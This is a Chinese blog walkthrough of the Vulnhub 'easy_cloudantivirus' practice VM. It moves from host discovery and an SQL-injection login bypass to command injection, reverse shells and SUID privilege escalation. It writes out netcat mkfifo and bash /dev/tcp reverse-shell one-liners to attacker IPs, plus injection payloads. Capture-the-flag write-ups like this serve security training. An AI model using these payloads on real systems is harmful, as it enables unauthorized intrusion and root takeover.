Vulnhub-easy_cloudantivirus

最新推荐文章于 2024-01-04 15:43:53 发布
最新推荐文章于 2024-01-04 15:43:53 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: vulnhub 文章标签: web安全 linux ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46107179/article/details/123898777
版权

靶机下载地址:靶机下载

主机发现

通过搭建的靶机环境,可以直接通过arp-scan -l 或者arping来发现主机,得到IP地址后进行信息搜集
在这里插入图片描述

信息搜集

通过nmap扫描得到靶机开放了22、8080端口,并且web服务是Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
在这里插入图片描述
既然是web服务,通过浏览器打开看到说需要邀请码,可能是需要什么密码什么的
在这里插入图片描述

渗透攻击

这里可以有两种攻击手段,一种是SQL注入,可以使用" or 1=1 --+绕过,另外一种是暴力破解,我这里使用burpsuite暴力破解的方式,利用kali自带的字典就可以爆破出密码为password,进入之后看见这是个扫描文件的东西
在这里插入图片描述
通过返回的页面感觉是执行了命令
在这里插入图片描述
然后尝试用管道符执行命令,发现这里有个命令执行漏洞
在这里插入图片描述
通过上面的文件发现有netcat和python,这里可以使用nc和python反弹shell,
这里有几种常见反弹shell的payload:反弹payload
这里使用nc反弹,发现使用-e /bin/bash没有反弹成功,可能是因为版本问题,但是可以使用另外一种不需要-e参数的payloadrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
在这里插入图片描述
这里还可以用bash来反弹echo 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'|bash 因为有python环境,可以创建交互式shell python -c "import pty;pty.spawn('/bin/sh');"
(还有一种很巧妙的方式,利用创建两个nc监听,然后利用管道符来执行/bin/bash)
在这里插入图片描述
查看app.py的文件,是关于这个web框架运行的代码,没有什么利用的地方,然后查看SQL文件,在靶机端没有sqlite3,所以需要通过nc把文件传到虚拟机上面打开,打开之后,发现有一些密码,然后通过查看/etc/passwd,得到一些用户名,尝试用hydra进行ssh爆破,但是未成功。
然后返回上一级目录,发现有一个.c文件,应该是源码,前面那个是编译好的可执行文件,并且有root执行权限
在这里插入图片描述
查看看源代码,发现执行命令需要两个参数,但是参数并没有进行任何过滤,应该可以通过system函数执行代码
在这里插入图片描述
因此,这里可以通过suid进行提权,尝试执行文件并带参数“-h | id”命令(参数-h是一般的说明参数,利用管道符执行id参数),发现可以进行提权成功
在这里插入图片描述
接着就可以利用nc反弹到kali上面,从而得到权限
在这里插入图片描述

Ability~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
熊猫云计算杀毒软件-CloudAntivirus
12-30
一款超好的免费杀毒软件,是最新的云计算的应用。客户端无需耗费多少内存和CPU,服务器承担计算过程。
vulnhub-easy_cloudantivirus
qq_41810304的博客
06-01 604
前言: 做这个靶机隔了很长时间,因为在搞毕业设计以及找工作,现在只能说论文告一段落,只剩答辩和ppt了,就接着把这个做完,下载地址也不想找了,总体而言该靶机比较简单。最后,求答辩老师放过我吧。 Kali:192.168.1.4 目标机:192.168.1.31 信息收集: 漏洞挖掘: 从信息来看,开放ssh和网站端口,并且该网站是Python写的。可以爆破22端口,一般来说还是从网站下手,在我看来爆破密码依然是最后手段。先访问8080端口。 一般这个界面没有思路的话就是看看页面源码有没
VulnHub打靶记录——easy_cloudantivirus
未完成的歌~的博客
06-29 503
靶机下载地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/将靶机设置为NAT模式并启动。
打靶第二周-easy_cloudantivirus
wcwdnmdnmd的博客
09-14 1721
easy_cloudantivirus靶机地址攻击手段所用工具开始攻击主机发现sql注入 靶机地址 easy_cloudantivirus 攻击手段 端口扫描 WEB侦查 SQL注入 命令注入 密码爆破 代码审计 NC串联 本地提权 所用工具 arping nmap 开始攻击 主机发现 使用arping来发现 因为arping一次只能扫一个可使用for i in $(seq 1 254);do arping -c 2 192.168.168.$i;done来扫描网段 也可使用nmap 192.168.
kali之vulhub,easycloudantivirus
weixin_54431413的博客
05-07 401
一、靶机描述 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录网址 六、利用远程命令执行漏洞与kali建立连接 七、提权 八、利用suid提取
easy_cloudantivirus靶机打靶过程及思路
qq_52610024的博客
04-04 2121
5.侦听4444端口通过连接获得shellnc10.0.2.44444-e/bin/bash-e的参数的作用是执行成功之后运行shell,发现。./update_cloudav“a|nc10.0.2.45555|/bin/bash|nc10.0.2.46666”进行suid。6.nc10.0.2.43333|/bin/bash|nc10.0.2.44444nc串联攻击。2.发现留言板后,两个思路,第一个思路是进行暴力破解,第二个思路是通过。...
vulnhub:easy_cloudantivirus靶机
qq_43884092的博客
02-05 179
到/tmp目录下执行bash,获得root权限。靶机:192.168.111.177。本地nc监听,反弹shell。在输入框填入双引号发现报错。用户家目录存放该程序源码。配合管道符可以执行命令。查找suid权限的文件。同样配合管道符执行命令。
0x02-easy_cloudantivirus
rec09er的博客
04-12 968
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova 通关目标:取得目标靶机的root权限 攻击机:kali(10.0.2.10) 目标靶机:easy_cloudantivirus(10.0.2.13) 涉及攻击方法:  ● 主机发现  ● 端口扫描  ● 目录扫描  ● SQL注入
VulnHub靶机-easy_cloudantivirus | 红队打靶02
qq_47289634的博客
07-20 217
靶机地址:攻击机kali IP:192.168.56.102这里是用的netdiscover+nmap 使用nmap对目标主机进行信息收集,看到开放了22,8080端口,分别运行了sshhttp服务 访问一下8080端口,发现是一个病毒防护的网站,需要输入邀请码 看到框就试试看有没有SQL注入,抓包,发送到burp中的测试模块爆破一下 看到有些响应长度很大的明显不一样,复制pyload,在网页打开看一下 直接看到了sql语句,根据sql语句构造闭合,在配合万能密码登录到后台, ,这里我们输入
Vulnhub-medium_socnet
weixin_46107179的博客
03-27 3694
靶机下载 搭建好靶机环境之后,进行全端口扫描,该靶机开放了22和5000端口 然后进行对端口进行服务扫描,得到一个python环境下搭建的web框架,版本是Werkzeug httpd 0.14.1,Werkzeug是一个WSGI工具包,也可以作为一个Web框架的底层库 然后在浏览器中访问该地址端口,并没有什么可以利用的;然后对隐藏目录进行扫描,得到一个admin目录 然后访问admin目录,得到一个可以执行代码的文本框 简单测试普通代码可以执行代码 接着我们可以在网上找一段利用Python代码进
(一)easy_cloudantivirus靶机渗透练习
最新发布
qq_69746732的博客
01-04 939
easy_cloudantivirus靶机渗透练习
Hack The Box——ScriptKiddie
热门推荐
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
Python工具包werkzeug
专注自动化、性能测试、测试架构学习交流
06-11 2457
首先,先向大家介绍一下什么是 werkzeugWerkzeug是一个WSGI工具包,他可以作为一个Web框架的底层库。这里稍微说一下, werkzeug 不是一个web服务器,也不是一个web框架,而是一个工具包,官方的介绍说是一个 WSGI 工具包,它可以作为一个 Web 框架的底层库,因为它封装好了很多 Web 框架的东西,例如 Request,Response 等等。 例如我最常用的 Flask 框架就是一 Werkzeug 为基础开发的,这也是我要解析一下 Werkzeug 底层的原因,因为我想
python web包_Werkzeug——python web开发工具包
weixin_39638105的博客
11-30 389
一:Werkzeug是个啥1)Werkzeug是一个工具包,它封装了很多东西,诸如: Request,Response等。2)Werkzeug不是web服务器,也不是web框架;二:Werkzeug怎么用Werkzeug的翻译很有意思——“犯罪工具”,它提供了很多封装好的类、API,可以帮助我们快速实现一些web开发所需要的功能。例如:WSGI接口的实现。Werkzeug官方教程中就以WSGI s...
werkzeug源码分析——从官网的示例代码开始
weixin_33755649的博客
12-14 297
全文基于Python 2.7 macOS 10.12.2 werkzeugPython实现的WSGI规范的使用函数库。什么是WSGI?如何理解CGI,WSGI网上的说明很多,在文章的开始,我想要强调两点 WSGI是一种服务器和客户端交互的接口规范 理解web组件:client, server, and middleware. 正如werkzeug官网Werkzeug上所说,werkzeug...
Vulnhub靶场之ColddBoxEasy
SoporAeternus12的博客
12-07 632
Vulnhub靶场之ColddBoxEasy 靶机下载地址: 本机kali地址:192.168.157.144 信息收集 查看目标ip地址和开放的端口号 nmap -sP 192.168.157.144/24 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:52 CST Nmap scan report for 192.168.157.2 Host is up (0.00060s latency). Nmap scan report for
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox3(Easy
Aluxian_的博客
09-07 1042
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。这个靶机也比较简单 因为标题是esay(简单级别的)1.信息收集 获取ip地址 和端口信息 进行扫描2.网站渗透 需要爆破网站后台密码 然后找模板和上传点 传木马进行回弹 获取shell3.最后是pkexec提权 的学习 和sudo提权一样4.还有Oracle VM虚拟机导入报错的解决方法!
Vulnhub:FUNBOX-EASY靶机
logan_logan的博客
06-06 482
1.浏览器输入目标靶机地址打开网页; 2.端口扫描 nmap -p- 192.168.31.109 nmap -sC -sV -p 22,80,33060 192.168.31.109 3.目录枚举 扫出了好多目录,故意迷惑我们这些小可爱………… gobuster dir -u http://192.168.31.109/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html 4.在浏览器中打开/sto
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 551
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
easys_cloudantivirus
m0_72733529的博客
07-14 764
靶机地址:BoredHackerBlog: Cloud AV ~ VulnHub靶 机 ip:192.168.0.156ka li ip:192.168.0.102内容简介:这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:端口扫描WEB侦查SQL注入命令注入密码爆破代码审计NC串联本地提权 nmap -p- 192.168.0.156 全端口扫描 nmap -p

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ability~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值